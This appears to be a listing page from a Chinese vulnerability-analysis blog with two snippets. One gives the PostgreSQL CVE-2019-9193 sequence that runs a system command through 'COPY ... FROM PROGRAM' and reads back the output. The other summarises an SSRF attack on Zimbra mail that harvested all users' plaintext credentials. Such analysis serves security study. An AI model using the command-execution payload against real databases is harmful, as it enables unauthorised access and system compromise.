CVE-2019-9193
-- 先删除你想要使用但是已经存在的表DROP TABLE IF EXISTS cmd_exec;-- 创建保存系统命令输出的表CREATE TABLE cmd_exec(cmd_output text);-- 执行系统命令利用特定函数COPY cmd_exec FROM PROGRAM 'id'; -- 查看执行结果SELECT * FROM cmd_exec;
漏洞解析
2023-08-07 PM
以SSRF流量转发方式获取Zimbra邮件服务中所有用户明文凭据
本文讲述了作者以邮件登录服务为突破口,利用其中的Zimbra应用功能和邮件端口配置bug,可以对目标邮件服务端执行流量转发设置(SSRF),实现对所有登录用户的明文凭据信息窃取。背景介绍Cafebazaar(巴扎应用商店):成立于2011年4月的一个伊朗安卓APP商店,专门给波斯语用户提供APP应用服务,其上有164000多个伊朗和国际软件游戏、社交媒体、信息等其他应用软件。2019年4月,...
漏洞解析
2020-09-27 PM